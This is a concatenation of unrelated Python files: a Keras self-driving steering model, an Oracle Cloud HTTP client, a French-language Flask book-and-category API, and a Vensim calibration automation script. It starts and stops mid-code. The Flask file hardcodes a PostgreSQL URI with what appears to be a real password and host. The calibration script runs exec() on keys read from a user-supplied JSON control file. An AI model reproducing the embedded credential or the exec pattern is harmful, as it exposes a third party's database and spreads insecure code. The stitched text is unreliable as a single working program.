255)) model.add(Conv2D(24, (5, 5), activation='relu', strides=(2, 2))) # model.add(MaxPool2D((2, 2), (1, 1))) model.add(Dropout(rate=dropout_rate)) model.add(Conv2D(36, (5, 5), activation='relu', strides=(2, 2))) # model.add(MaxPool2D((2, 2), (1, 1))) model.add(Dropout(rate=dropout_rate)) model.add(Conv2D(48, (5, 5), activation='relu', strides=(2, 2))) # model.add(MaxPool2D((2, 2), (1, 1))) model.add(Dropout(rate=dropout_rate)) model.add(Conv2D(64, (3, 3), activation='relu')) # model.add(MaxPool2D((2, 2), (1, 1))) model.add(Dropout(rate=dropout_rate)) model.add(Conv2D(64, (3, 3), activation='relu')) # model.add(MaxPool2D((2, 2), (1, 1))) model.add(Dropout(rate=dropout_rate)) model.add(Flatten()) model.add(Dense(100)) model.add(Dropout(rate=dropout_rate)) model.add(Dense(50)) model.add(Dropout(rate=dropout_rate)) model.add(Dense(10)) model.add(Dropout(rate=dropout_rate)) model.add(Dense(1)) model.compile(loss='mse', optimizer='adam') model.fit(X_train, y_train, validation_split=0.2, epochs=20, shuffle=True, callbacks=[EarlyStopping(patience=8)]) return model X_train, y_train = read_training_data('./training/driving_log.csv') model = train(X_train, y_train) model.save('model.h5')
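# --- Hedged usage sketch (not part of the training script above) ---
# Load the saved model.h5 and predict a steering angle for a single camera
# frame. The image path is a hypothetical placeholder; cropping and
# normalisation happen inside the model (Cropping2D / Lambda layers), so a raw
# 160x320x3 frame can be fed directly.
import numpy as np
import cv2
from keras.models import load_model

model = load_model('model.h5')
frame = cv2.imread('center_camera_sample.jpg')   # hypothetical frame, expected shape (160, 320, 3)
steering_angle = float(model.predict(np.expand_dims(frame, axis=0))[0][0])
print('predicted steering angle:', steering_angle)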
# -*- coding: utf-8 -*- """ #@Filename : requests_client #@Date : [7/30/2018 1:51 PM] #@Poject: gc3-query #@AUTHOR : emharris ~~~~~~~~~~~~~~~~ <DESCR SHORT> <DESCR> """ ################################################################################ ## Standard Library Imports ################################################################################ ## Third-Party Imports from urllib.parse import unquote_plus from bravado.requests_client import RequestsClient, BasicAuthenticator from requests.auth import HTTPBasicAuth from requests.auth import _basic_auth_str ################################################################################ ## Project Imports from gc3_query.lib import * from gc3_query.lib import gc3_cfg from gc3_query.lib import get_logging _debug, _info, _warning, _error, _critical = get_logging(name=__name__) class IaaSRequestsHTTPBasicAuth(HTTPBasicAuth): def __init__(self, username, password): super().__init__(username, password) def __call__(self, r): r.headers['Authorization'] = _basic_auth_str(self.username, self.password) return r class IaaSRequestsBasicAuthenticator(BasicAuthenticator): def __init__(self, host, username, password): super().__init__(host, username, password) def __call__(self, *args, **kwargs): pass class IaaSRequestsHTTPClient(RequestsClient): """Synchronous HTTP client implementation with tweaks for Oracle Cloud. """ def __init__(self, idm_cfg: Dict[str, Any], skip_authentication: bool = False): super().__init__() self.idm_cfg = idm_cfg self.skip_authentication = skip_authentication self.idm_domain_name = self.idm_cfg.name self.rest_endpoint: str = self.idm_cfg.rest_endpoint # self.headers = {'Content-Type': 'application/oracle-compute-v3+json', # 'Accept': 'application/oracle-compute-v3+json, json, text/html', # } # self.session.headers['Content-Type'] = 'application/oracle-compute-v3+json' if gc3_cfg.user.use_proxy: _info(f"gc3_cfg.user.use_proxy={gc3_cfg.user.use_proxy}, configuring proxy.") self.proxies = {'http': gc3_cfg.network.http_proxy, 'https': gc3_cfg.network.https_proxy} self.session.proxies.update(self.proxies) else: _info(f"gc3_cfg.user.use_proxy={gc3_cfg.user.use_proxy}, not configuring proxy.") self.proxies = None _debug(f"rest_endpoint={self.rest_endpoint}") _debug(f"proxies={self.proxies}") _debug(f"idm_cfg={self.idm_cfg}") # _debug(f"headers={self.headers}") if self.skip_authentication: _warning(f"skip_authentication={self.skip_authentication}, authentication disabled.") self.auth_cookie_header = None else: self.auth_cookie_header = self.authenticate() # self.session.headers.update(self.auth_cookie_header) _debug(f"self.session.headers={self.session.headers}") @property def authenticated(self): return 'nimbula' in self.session.cookies def authenticate(self) -> dict: auth_url = f"{self.rest_endpoint}/authenticate/" idm_cred = gc3_cfg.get_credential(idm_domain_name=self.idm_cfg.name) # BULLSHIT, this doesn't work! 
If you are using a traditional cloud account or if your account creation email contains information about the identity domain as shown in the following example, # then you must use the following format for the two-part user name: # /Compute-identityDomainName/username # # If you are using a cloud account with Identity Cloud Service (IDCS) or if your account creation email does not contain information about the identity domain, # then you must use the following format for the two-part user name: # /Compute-serviceInstanceID/username # json_data = {"user": f"/Compute-{self.idm_cfg.service_instance_id}/{idm_cred.username}", "password": idm_cred.password} user = f"/{self.idm_cfg.formal_name}/{idm_cred.username}" json_data = {"user": user, "password": idm_cred.password} # json_data = {"user": f"/Compute-{self.idm_cfg.name}/{idm_cred.username}", "password": idm_cred.password} response = self.session.post(url=auth_url, json=json_data) if response.ok: _info(f'Response OK: {response.ok}, Status Code: {response.status_code}, URL: {response.url}') else: _debug(f"Failed to authenticate user: auth_url={auth_url}, self.idm_cfg={self.idm_cfg}") _error(f'Response OK: {response.ok}, Status Code: {response.status_code}, URL: {response.url}') raise RuntimeError(f"Failed to authenticate user: auth_url={auth_url}, self.idm_cfg={self.idm_cfg}") cookie_header = {'Cookie': response.headers['Set-Cookie']} _debug(f"cookie_header={cookie_header}") # TODO: enable this # del(idm_cred) # del(json_data) # del(response) return cookie_header @staticmethod def separate_params(request_params: DictStrAny) -> Tuple[DictStrAny, DictStrAny]: """Splits the passed in dict of request_params into two buckets, and Replace %xx escapes in the URL by their single-character equivalent. - sanitized_params are valid kwargs for constructing a requests.Request(..) - misc_options are things like timeouts which can't be communicated to the Requests library via the requests.Request(...) constructor. :param request_params: kitchen sink of request params. Treated as a read-only dict. :returns: tuple(sanitized_params, misc_options) """ _debug(f"input request_params={request_params}") sanitized_params: Dict[str, Any] misc_options: Dict[str, Any] sanitized_params, misc_options = RequestsClient.separate_params(request_params=request_params) _debug(f"From RequestsClient baseclass: sanitized_params={sanitized_params}, misc_options={misc_options}") unquoted_url = unquote_plus(sanitized_params['url']) _debug(f"unquoted_url={unquoted_url}") sanitized_params['url'] = unquoted_url return sanitized_params, misc_options
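# --- Hedged helper sketch illustrating the two-part user formats documented in
# the comment block above; the function name, parameters, and example values are
# hypothetical and not part of the gc3-query API. Traditional accounts use the
# identity domain name, IDCS-based cloud accounts use the service instance ID.
def build_compute_user(username: str, identity_domain: str = None, service_instance_id: str = None) -> str:
    """Return '/Compute-<identityDomainName>/<username>' or '/Compute-<serviceInstanceID>/<username>'."""
    qualifier = identity_domain if identity_domain is not None else service_instance_id
    return f"/Compute-{qualifier}/{username}"

# e.g. build_compute_user("jane.doe@example.com", identity_domain="myIdentityDomain")
#      -> "/Compute-myIdentityDomain/jane.doe@example.com"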
from distutils.log import error from enum import unique import os from flask_migrate import Migrate from flask import Flask, jsonify, redirect, render_template, request, url_for, abort from flask_sqlalchemy import SQLAlchemy from dotenv import load_dotenv from urllib.parse import quote_plus load_dotenv() app = Flask(__name__) motdepasse=("motdepasse") motdepasse = quote_plus(os.getenv('pswd_db')) app.config['SQLALCHEMY_DATABASE_URI'] = "postgresql://yqoameeujwohws:bac0c500849bdd021f07a7c3fd7340220da1531b7733405d6eb5ea4214db1e61@ec2-52-44-50-220.compute-1.amazonaws.com:5432/devu6ihe8a91si" #app.config['SQLALCHEMY_DATABASE_URI'] = "postgresql://postgres:{}@localhost:5432/Biblio".format(motdepasse) app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False db=SQLAlchemy(app) migrate = Migrate(app,db) #Creation des tables Catégorie et Livre class Categorie(db.Model): __tablename__ = 'categories' categorie_id = db.Column(db.Integer, primary_key=True) libelle = db.Column(db.String(150), nullable=False) valeur = db.relationship ("Livre",backref = "categories",lazy=True ) def __init__(self,libelle): self.libelle = libelle def insert(self): db.session.add(self) db.session.commit() def delete(self): db.session.delete(self) db.session.commit() def update(self): db.session.commit() def format(self): return { 'id_categorie': self.categorie_id, 'libelle_categorie' : self.libelle } class Livre(db.Model): __tablename__ = 'livres' id = db.Column(db.Integer, primary_key=True) isbn = db.Column(db.String(12), nullable=False) titre = db.Column(db.String(150), nullable=False) date_publication = db.Column(db.Date, nullable=False) auteur = db.Column(db.String(150), nullable=False) editeur = db.Column(db.String(150), nullable=False) categorie_id = db.Column(db.Integer,db.ForeignKey('categories.categorie_id'),nullable=False) def __init__(self,isbn,titre, date_publication,auteur,editeur,categorie_id): self.isbn = isbn self.titre = titre self.date_publication = date_publication self.auteur = auteur self.editeur = editeur self.categorie_id = categorie_id def insert(self): db.session.add(self) db.session.commit() def delete(self): db.session.delete(self) db.session.commit() def update(self): db.session.commit() def format(self): return { 'id' : self.id, 'isbn' : self.isbn, 'titre' : self.titre, 'date_publication' : self.date_publication, 'auteur' : self.auteur, 'editeur' : self.editeur, 'categorie_id': self.categorie_id } db.create_all() def paginate(request): items = [item.format() for item in request] return items ############################## # Lister tous les livres + ############################## @app.route('/livres') def get_livres(): try: livres = Livre.query.all() livres = paginate(livres) return jsonify({ 'success': True, 'status_code': 200, 'livres': livres, 'total_livres': len(livres) }) except: abort(404) finally: db.session.close() ################################################# # Chercher un livre en particulier par son id + ################################################# @app.route('/livres/<int:id>') def get_book(id): livre = Livre.query.get(id) if livre is None: abort(404) else: return livre.format() ################################################ # Lister la liste des livres d'une categorie ################################################ @app.route('/categories/<int:id>/livres') def book_category(id): try: category = Categorie.query.get(id) books = Livre.query.filter_by(categorie_id=id).all() books = paginate(books) return jsonify({ 'Success': True, 'Status_code': 200, 'total': len(books), 
'categorie': category.format(), 'livres': books }) except: abort(404) finally: db.session.close() ####################################### # Lister toutes les categories + ####################################### @app.route('/categories') def get_categories(): categories = Categorie.query.all() categories = paginate(categories) if categories is None: abort(404) else: return jsonify({ 'success': True, 'status_code': 200, 'Categorie': categories, 'total': len(categories) }) ######################################## # Chercher une categorie par son id + ######################################## @app.route('/categories/<int:id>') def get_category(id): categorie = Categorie.query.get(id) if categorie is None: abort(404) else: return categorie.format() ############################ # Supprimer un livre + ############################ @app.route('/livres/<int:id>', methods=['DELETE']) def del_livre(id): try: livr = Livre.query.get(id) livr.delete() return jsonify({ 'success': True, 'id_book': id, 'new_total': livr.query.count() }) except: abort(404) finally: db.session.close() ############################# # Supprimer une categorie + ############################# @app.route('/categories/<int:id>', methods=['DELETE']) def del_categorie(id): try: category = Categorie.query.get(id) category.delete() return jsonify({ 'success': True, 'status': 200, 'id_cat': id, 'new_total': Categorie.query.count() }) except: abort(404) finally: db.session.close() ########################################### # Modifier les informations d'un livre ########################################### @app.route('/livres/<int:id>', methods=['PATCH']) def change_book(id): body = request.get_json() book = Livre.query.get(id) try: if 'titre' in body and 'auteur' in body and 'editeur' in body and 'date_publication' in body: book.titre = body['titre'] book.auteur = body['auteur'] book.editeur = body['editeur'] book.date_publication = body['date_publication'] book.update() return jsonify ({ 'success modify' : True, 'book' : book.format() }) except: abort(404) ######################################## # Modifier le libellé d'une categorie ######################################## @app.route('/categories/<int:id>', methods=['PATCH']) def change_name(id): body = request.get_json() category = Categorie.query.get(id) try: if 'libelle_categorie' in body: category.libelle = body['libelle_categorie'] category.update() return jsonify({ 'success modify' : True, 'category':category.format() }) except: abort(404) ############################################## # Rechercher un livre par son titre ou son auteur ############################################## @app.route('/livres/<string:word>') def search_book(word): mot = '%'+word+'%' titre = Livre.query.filter(Livre.titre.like(mot)).all() titre = paginate(titre) return jsonify({ 'livres': titre }) '''@app.route('/livres/<string:value>') def search_livre(value): val = '%'+value+'%' auteur = Livre.query.filter(Livre.auteur.like(val)).all() auteur = paginate(auteur) return jsonify({ 'livres': auteur })''' ############################################## # Ajouter une categorie ############################################## @app.route('/categories', methods=['POST']) def add_category(): body = request.get_json() new_categorie = body['libelle_categorie'] category = Categorie(libelle=new_categorie) category.insert() return jsonify({ 'success': True, 'added': category.format(), 'total_categories': Categorie.query.count() }) ############################################## # Ajouter un livre 
##############################################
@app.route('/livres', methods=['POST'])
def add_book():
    body = request.get_json()
    isbn = body['isbn']
    new_titre = body['titre']
    new_date = body['date_publication']
    new_auteur = body['auteur']
    new_editeur = body['editeur']
    categorie_id = body['categorie_id']
    livre = Livre(isbn=isbn, titre=new_titre, date_publication=new_date,
                  auteur=new_auteur, editeur=new_editeur, categorie_id=categorie_id)
    livre.insert()
    count = Livre.query.count()
    return jsonify({
        'success': True,
        'added': livre.format(),
        'total_books': count,
    })


@app.errorhandler(404)
def not_found(error):
    return (jsonify({'success': False, 'error': 404, 'message': 'Not found'}), 404)


@app.errorhandler(400)
def error_client(error):
    return (jsonify({'success': False, 'error': 400, 'message': 'Bad request'}), 400)


@app.errorhandler(500)
def server_error(error):
    return (jsonify({'success': False, 'error': 500, 'message': 'Internal server error'}), 500)


@app.errorhandler(405)
def method_not_allowed(error):
    return (jsonify({'success': False, 'error': 405, 'message': 'Method not allowed'}), 405)
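# --- Hedged client-side sketch (not part of the API above) ---
# Assumes the Flask app is served locally on port 5000; the JSON field names
# come straight from the add_category and add_book handlers.
import requests

BASE = "http://localhost:5000"

cat = requests.post(f"{BASE}/categories", json={"libelle_categorie": "Roman"}).json()
livre = requests.post(f"{BASE}/livres", json={
    "isbn": "978014300723",
    "titre": "Exemple de titre",
    "date_publication": "2020-01-01",
    "auteur": "A. Auteur",
    "editeur": "Editions Exemple",
    "categorie_id": cat["added"]["id_categorie"],
}).json()
print(requests.get(f"{BASE}/livres").json()["total_livres"])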
import os import subprocess import re import json import time import pandas as pd from keyboard import press from shutil import copy from distutils.dir_util import copy_tree class Script(object): """Master object for holding and modifying .cmd script settings, creating .cmd files, and running them through Vensim/Vengine""" def __init__(self, controlfile): print("Initialising", self) for k, v in controlfile['simsettings'].items(): self.__setattr__(k, v if isinstance(v, str) else v.copy()) self.runcmd = "MENU>RUN_OPTIMIZE|o\n" self.savecmd = f"MENU>VDF2TAB|!|!|{self.savelist}|\n" self.basename = controlfile['baserunname'] self.cmdtext = [] def copy_model_files(self, dirname): """Create subdirectory and copy relevant model files to it, then change working directory to subdirectory""" os.makedirs(dirname, exist_ok=True) os.chdir(f"./{dirname}") # Copy needed files from the working directory into the sub-directory for s in ['model', 'payoff', 'optparm', 'sensitivity', 'savelist', 'senssavelist']: if getattr(self, s): copy(f"../{getattr(self, s)}", "./") for slist in ['data', 'changes']: for file in getattr(self, slist): copy(f"../{file}", "./") def add_suffixes(self, settingsfxs): """Cleanly modifies .cmd script settings with specified suffixes""" for s, sfx in settingsfxs.items(): if hasattr(self, s): self.__setattr__(s, getattr(self, s)[:-4] + sfx + getattr(self, s)[-4:]) def update_changes(self, chglist): """Reformats chglist as needed to extend changes settings; see compile_script for details""" # Combines and flattens list of paired change names & suffixes flatlist = [i for s in [[f"{self.basename}_{n}_{sfx}.out" for n in name] if isinstance(name, list) else [f"{self.basename}_{name}_{sfx}.out"] for name, sfx in chglist] for i in s] self.changes.extend(flatlist) def write_script(self, scriptname): """Compiles and writes actual .cmd script file""" self.cmdtext.extend(["SPECIAL>NOINTERACTION\n", f"SPECIAL>LOADMODEL|{self.model}\n"]) for s in ['payoff', 'sensitivity', 'optparm', 'savelist', 'senssavelist']: if hasattr(self, s): self.cmdtext.append(f"SIMULATE>{s}|{getattr(self, s)}\n") if hasattr(self, 'data'): datatext = ','.join(self.data) self.cmdtext.append(f"SIMULATE>DATA|\"{','.join(self.data)}\"\n") if hasattr(self, 'changes'): self.cmdtext.append(f"SIMULATE>READCIN|{self.changes[0]}\n") for file in self.changes[1:]: self.cmdtext.append(f"SIMULATE>ADDCIN|{file}\n") self.cmdtext.extend(["\n", f"SIMULATE>RUNNAME|{scriptname}\n", self.runcmd, self.savecmd, "SPECIAL>CLEARRUNS\n", "MENU>EXIT\n"]) with open(f"{scriptname}.cmd", 'w') as scriptfile: scriptfile.writelines(self.cmdtext) def run_script(self, scriptname, controlfile, subdir, logfile): """Runs .cmd script file using function robust to Vengine errors, and returns payoff value if applicable""" return run_vengine_script(scriptname, controlfile['vensimpath'], controlfile['timelimit'], '.log', check_opt, logfile) class CtyScript(Script): """Script subclass for country optimization runs""" def __init__(self, controlfile): super().__init__(controlfile) self.genparams = controlfile['genparams'].copy() def prep_subdir(self, scriptname, controlfile, subdir): """Creates subdirectory for country-specific files and output""" self.copy_model_files(subdir) copy(f"../{scriptname}.cmd", "./") self.genparams.append(f"[{subdir}]") for file in self.changes: clean_outfile(file, self.genparams) def run_script(self, scriptname, controlfile, subdir, logfile): self.prep_subdir(scriptname, controlfile, subdir) run_vengine_script(scriptname, 
controlfile['vensimpath'], controlfile['timelimit'], '.log', check_opt, logfile) copy(f"./{scriptname}.out", "..") # Copy the .out file to parent directory os.chdir("..") class CtyMCScript(CtyScript): """Script subclass for country MCMC optimizations""" def run_script(self, scriptname, controlfile, subdir, logfile): self.prep_subdir(scriptname, controlfile, subdir) run_vengine_script(scriptname, controlfile['vensimpath'], controlfile['timelimit'], '_MCMC_points.tab', check_MC, logfile) # Create downsample and copy to parent directory downsample(scriptname, controlfile['samplefrac']) copy(f"./{scriptname}_MCMC_sample_frac.tab", "..") copy(f"./{scriptname}.out", "..") # Copy the .out file to parent directory os.chdir("..") class LongScript(Script): """Script subclass for long calibration runs e.g. all-params""" def run_script(self, scriptname, controlfile, subdir, logfile): return run_vengine_script(scriptname, controlfile['vensimpath'], controlfile['timelimit']*5, '.log', check_opt, logfile) class ScenScript(Script): """Script subclass for scenario analysis with .cin files""" def update_changes(self, chglist): scen = chglist.pop() super().update_changes(chglist) self.changes.append(scen) chglist.append(scen) def run_script(self, scriptname, controlfile, subdir, logfile): return run_vengine_script(scriptname, controlfile['vensimpath'], controlfile['timelimit'], '.vdf', check_run, logfile) class ScenRunScript(ScenScript): """Script subclass for scenario analysis runs (not optimizations)""" def __init__(self, controlfile): super().__init__(controlfile) self.runcmd = "MENU>RUN|o\n" class ScenSensScript(ScenScript): """Script subclass for scenario sensitivity analysis""" def __init__(self, controlfile): super().__init__(controlfile) self.sensitivity = self.basename + '_full.vsc' self.runcmd = "MENU>RUN_SENSITIVITY|o\n" self.savecmd = f"MENU>SENS2FILE|!|!|%#[\n" class SMSensScript(ScenScript): """Script subclass for submodel sensitivity analysis""" def __init__(self, controlfile): super().__init__(controlfile) self.runcmd = "MENU>RUN_SENSITIVITY|o\n" self.savecmd = f"MENU>SENS2FILE|!|!|>T\n" def compile_script(controlfile, scriptclass, name, namesfx, settingsfxs, logfile, chglist=[], subdir=None): """Master function for assembling & running .cmd script Parameters ---------- controlfile : JSON object Master control file specifying sim settings, runname, etc. scriptclass : Script object Type of script object to instantiate, depending on run type name : str namesfx : str Along with `name`, specifies name added to baserunname for run settingsfxs : dict of str Dict of suffixes to append to filenames in simsettings; use to distinguish versions of e.g. .mdl, .voc, .vpd etc. files logfile : str of filename/path chglist : list of tuples of (str or list, str) Specifies changes files to be used in script; specify as tuples corresponding to `name`, `namesfx` of previous run .out to use; tuples can also take a list of `names` as first element, taking each with the same second element; `chglist` can also take one non-tuple str as its last element, which will be added directly (e.g. 
for policy scenario .cin files) subdir : str, optional Name of subdirectory to create/use for run, if applicable Returns ------- float Payoff value of the script run, if applicable, else 0 """ mainscript = scriptclass(controlfile) mainscript.add_suffixes(settingsfxs) mainscript.update_changes(chglist) scriptname = f"{mainscript.basename}_{name}_{namesfx}" mainscript.write_script(scriptname) return mainscript.run_script(scriptname, controlfile, subdir, logfile) def write_log(string, logfile): """Writes printed script output to a logfile""" with open(logfile,'a') as f: f.write(string + "\n") print(string) def check_opt(scriptname, logfile): """Check function for use with run_vengine_script for optimizations""" if check_zeroes(scriptname): write_log(f"Help! {scriptname} is being repressed!", logfile) return not check_zeroes(scriptname) def check_MC(scriptname, logfile, threshold=0.01): """Check function for use with run_vengine_script for MCMC""" if abs(compare_payoff(scriptname, logfile)) >= threshold: write_log(f"{scriptname} is a self-perpetuating autocracy! re-running MC...", logfile) return False return True def check_run(scriptname, logfile): """Check function for use with run_vengine_script for normal & sens runs""" if not os.path.exists(f"./{scriptname}.vdf"): write_log(f"Help! {scriptname} is being repressed!", logfile) return os.path.exists(f"./{scriptname}.vdf") def run_vengine_script(scriptname, vensimpath, timelimit, checkfile, check_func, logfile): """Call Vensim with command script using subprocess; monitor output file for changes to see if Vensim has stalled out, and restart if it does, or otherwise bugs out; return payoff if applicable""" write_log(f"Initialising {scriptname}!", logfile) while True: proc = subprocess.Popen(f"{vensimpath} \"./{scriptname}.cmd\"") time.sleep(2) press('enter') # Necessary to bypass the popup message in Vengine while True: try: # Break out of loop if run completes within specified timelimit proc.wait(timeout=timelimit) break except subprocess.TimeoutExpired: try: # If run not complete before timelimit, check to see if still ongoing write_log(f"Checking for {scriptname}{checkfile}...", logfile) timelag = time.time() - os.path.getmtime(f"./{scriptname}{checkfile}") if timelag < (timelimit): write_log(f"At {time.ctime()}, {round(timelag,3)}s since last output, " "continuing...", logfile) continue else: # If output isn't being written, kill and restart run proc.kill() write_log(f"At {time.ctime()}, {round(timelag,3)}s since last output. " "Calibration timed out!", logfile) break except FileNotFoundError: # If output isn't being written, kill and restart run proc.kill() write_log("Calibration timed out!", logfile) break if proc.returncode != 1: # Note that Vengine returns 1 on MENU>EXIT, not 0! write_log(f"Return code is {proc.returncode}", logfile) write_log("Vensim! Trying again...", logfile) continue try: # Ensure output is not bugged (specifics depend on type of run) if check_func(scriptname, logfile): break except FileNotFoundError: write_log("Outfile not found! 
That's it, I'm dead.", logfile) pass time.sleep(2) if os.path.exists(f"./{scriptname}.out"): payoffvalue = read_payoff(f"{scriptname}.out") write_log(f"Payoff for {scriptname} is {payoffvalue}, calibration complete!", logfile) return payoffvalue return 0 # Set default payoff value for simtypes that don't generate one def modify_mdl(country, modelname, newmodelname): """Opens .mdl as text, identifies Rgn subscript, and replaces with appropriate country name""" with open(modelname,'r') as f: filedata = f.read() rgnregex = re.compile(r"Rgn(\s)*?:(\n)?[\s\S]*?(\n\t~)") newdata = rgnregex.sub(f"Rgn:\n\t{country}\n\t~", filedata) with open(newmodelname,'w') as f: f.write(newdata) def split_voc(vocname, fractolfactor, mcsettings): """Splits .VOC file into multiple versions, for main, country, initial, full model, general MCMC, and country MCMC calibration""" with open(vocname,'r') as f0: filedata = f0.readlines() vocmain = [line for line in filedata if line[0] == ':' or '[Rgn]' not in line] voccty = [line for line in filedata if line[0] == ':' or '[Rgn]' in line] vocfull = filedata.copy() vocinit = voccty.copy() # Identify and multiply fracitonal tolerance by fractolfactor for initial runs for l, line in enumerate(vocinit): if ':FRACTIONAL_TOLERANCE' in line: fractol = float(line.split('=')[1]) vocinit[l] = f":FRACTIONAL_TOLERANCE={min(fractol*fractolfactor,0.1)}\n" # Set restarts to 1 for vocs besides initial for voc in (vocmain, voccty, vocfull): for l, line in enumerate(voc): if ':RESTART_MAX' in line: voc[l] = ':RESTART_MAX=1\n' vocmainmc = ''.join(vocmain) vocctymc = ''.join(voccty) # Make necessary substitutions for MCMC settings for k,v in mcsettings.items(): vocmainmc = re.sub(f":{re.escape(k)}=.*", f":{k}={v}", vocmainmc) vocctymc = re.sub(f":{re.escape(k)}=.*", f":{k}={v}", vocctymc) # Write various voc versions to separate .voc files for fname, suffix in zip([vocmain, voccty, vocinit, vocfull, vocmainmc, vocctymc], ['m', 'c', 'i', 'f', 'mmc', 'cmc']): with open(f"{vocname[:-4]}_{suffix}.voc", 'w') as f: f.writelines(fname) def check_zeroes(scriptname): """Check if an .out file has any parameters set to zero (indicates Vengine error), return True if any parameters zeroed OR if # runs = # restarts, and False otherwise""" filename = f"{scriptname}.out" with open(filename,'r') as f0: filedata = f0.readlines() checklist = [] for line in filedata: if line[0] != ':': if ' = 0 ' in line: checklist.append(True) else: checklist.append(False) elif ':RESTART_MAX' in line: restarts = re.findall(r'\d+', line)[0] # Ensure number of simulations != number of restarts if f"After {restarts} simulations" in filedata[0]: checklist.append(True) return any(checklist) def clean_outfile(outfilename, linekey): """Clean an outfile to include only lines containing a string in [linekey] Note that [linekey] should be a list of strings to keep""" with open(outfilename,'r') as f: filedata = f.readlines() newdata = [line for line in filedata if any(k in line for k in linekey)] with open(outfilename, 'w') as f: f.writelines(newdata) def create_mdls(controlfile, logfile): """Creates copies of the base .mdl file for each country in list (and one main copy) and splits .VOC files""" model = controlfile['simsettings']['model'] for c in controlfile['countrylist']: newmodel = model[:-4] + f'_{c}.mdl' modify_mdl(c, model, newmodel) mainmodel = model[:-4] + '_main.mdl' c_list = [f'{c}\\\n\t\t' if i % 8 == 7 else c for i,c in enumerate(countrylist)] countrylist_str = str(c_list)[1:-1].replace("'","") modify_mdl(countrylist_str, 
model, mainmodel) split_voc(controlfile['simsettings']['optparm'], controlfile['fractolfactor'], controlfile['mcsettings']) write_log("Files are ready! moving to calibration", logfile) def read_payoff(outfile, line=1): """Identifies payoff value from .OUT or .REP file - use line 1 (default) for .OUT, or use line 0 for .REP""" with open(outfile) as f: payoffline = f.readlines()[line] payoffvalue = [float(s) for s in re.findall(r'-?\d+\.?\d+[eE+-]*\d+', payoffline)][0] return payoffvalue def compare_payoff(scriptname, logfile): """Returns the difference in payoffs between .OUT and .REP file, which should be zero in most cases except when MCMC bugs out""" difference = read_payoff(f"{scriptname}.out") - read_payoff(f"{scriptname}.rep", 0) write_log(f".OUT and .REP payoff difference is {difference}", logfile) return difference def increment_seed(vocfile, logfile): """Increments random number seed in a .VOC file by 1""" with open(vocfile, 'r') as f: vocdata = f.read() seedregex = re.compile(r':SEED=\d+') try: i = int(re.search(r'\d+', re.search(seedregex, vocdata).group()).group()) newdata = seedregex.sub(f":SEED={i+1}", vocdata) with open(vocfile, 'w') as f: f.write(newdata) except: write_log("No seed found, skipping incrementing.", logfile) def downsample(scriptname, samplefrac): """Downsamples an MCMC _sample tab file according to specified samplefrac, then deletes MCMC _sample and _points files to free up disk space (files can be VERY large otherwise!)""" rawdf = pd.read_csv(f"{scriptname}_MCMC_sample.tab", sep='\t') newdf = rawdf.sample(frac=samplefrac) newdf.to_csv(f"{scriptname}_MCMC_sample_frac.tab", sep='\t', index=False) os.remove(f"{scriptname}_MCMC_sample.tab") os.remove(f"{scriptname}_MCMC_points.tab") def merge_samples(baserunname, countrylist): """Combines downsampled MCMC outputs into a single sensitivity input tabfile and creates .vsc file using it for sensitivity control""" filelist = [f"{baserunname}_{c}_MC_MCMC_sample_frac.tab" for c in countrylist] dflist = [] for f in filelist: ctydf = pd.read_csv(f, sep='\t') dflist.append(ctydf) sensdf = pd.concat(dflist, axis=1) sensdf.dropna(axis=1, how='all', inplace=True) sensdf.dropna().to_csv(f"{baserunname}_full_sample_frac.tab", sep='\t', index=False) with open(f"{baserunname}_full.vsc", 'w') as f: f.write(f",F,,{baserunname}_full_sample_frac.tab,0") controlfilename = input("Enter control file name (with extension):") cf = json.load(open(controlfilename, 'r')) # Unpack controlfile into variables for k,v in cf.items(): exec(k + '=v') # Set up files in run directory and initialise logfile master = Script(cf) master.changes.extend(scenariolist) master.copy_model_files(f"{baserunname}_IterCal") copy(f"../{controlfilename}", "./") logfile = f"{os.getcwd()}/{baserunname}.log" write_log(f"-----\nStarting new log at {time.ctime()}\nReady to work!", logfile) # Initialise necessary .mdl and .voc files create_mdls(cf, logfile) # If iterlimit set to 0 (bypass), go straight to all-params Powell optimization if iterlimit == 0: write_log("Iteration is no basis for a system of estimation. Bypassing!", logfile) # Skip all-params if previously already done if os.path.exists(f"./{baserunname}_main_full.out"): write_log("Hang on to outdated imperialist dogma! 
Using previous output...", logfile) else: compile_script(cf, LongScript, 'main', 'full', {'model': '_main', 'optparm': '_f'}, logfile) # Otherwise run iterative calibration process as normal else: # First do initial calibration round for c in countrylist: compile_script(cf, CtyScript, c, 0, {'model': f'_{c}', 'optparm': '_i'}, logfile, subdir=c) payoff_list = [compile_script(cf, Script, 'main', 0, {'model': '_main', 'optparm': '_m'}, logfile, chglist=[(countrylist, 0)])] payoff_delta = abs(payoff_list[0]) i = 1 # Then iterate until convergence or until limit is reached while payoff_delta > threshold: write_log(f"More work? Okay! Starting iteration {i}", logfile) for c in countrylist: compile_script(cf, CtyScript, c, i, {'model': f'_{c}', 'optparm': '_c'}, logfile, chglist=[('main', i-1), (c, i-1)], subdir=c) payoff_list.append( compile_script(cf, Script, 'main', i, {'model': '_main', 'optparm': '_m'}, logfile, chglist=[('main', i-1), (countrylist, i)])) payoff_delta = abs(payoff_list[-1] - payoff_list[-2]) i += 1 # Increment random number seeds for VOC files increment_seed(f"{simsettings['optparm'][:-4]}_c.voc", logfile) increment_seed(f"{simsettings['optparm'][:-4]}_m.voc", logfile) write_log(f"Payoff list thus far is {payoff_list}", logfile) write_log(f"Payoff delta is {payoff_delta}", logfile) if i > iterlimit: write_log("Iteration limit reached!", logfile) break else: write_log("Payoff delta is less than threshold. Moving on!", logfile) # Run one more full calibration with all parameters compile_script(cf, LongScript, 'main', 'full', {'model': '_main', 'optparm': '_f'}, logfile, chglist=[('main', i-1), (countrylist, i-1)]) # If MCMC option is on, initialise MCMC if mccores != 0: write_log("We're an anarcho-syndicalist commune!\n" f"Initiating MCMC at {time.ctime()}!", logfile) for c in countrylist: compile_script(cf, CtyMCScript, c, 'MC', {'model': f'_{c}', 'optparm': '_cmc'}, logfile, chglist=[('main', 'full')], subdir=c) write_log(f"MCMC completed at {time.ctime()}!", logfile) # Run fixed & sensitivity analysis for each scenario specified merge_samples(baserunname, countrylist) for cin in scenariolist: chglist = [('main', 'full'), (countrylist, 'MC'), cin] write_log(f"Running scenario {cin}!", logfile) compile_script(cf, ScenRunScript, 'final', cin[:-4], {'model': '_main'}, logfile, chglist=chglist) compile_script(cf, ScenSensScript, 'sens', cin[:-4], {'model': '_main'}, logfile, chglist=chglist) time.sleep(2) # Run any submodels specified using their own controlfiles for submod in submodlist: copy_tree(f"../{submod}", 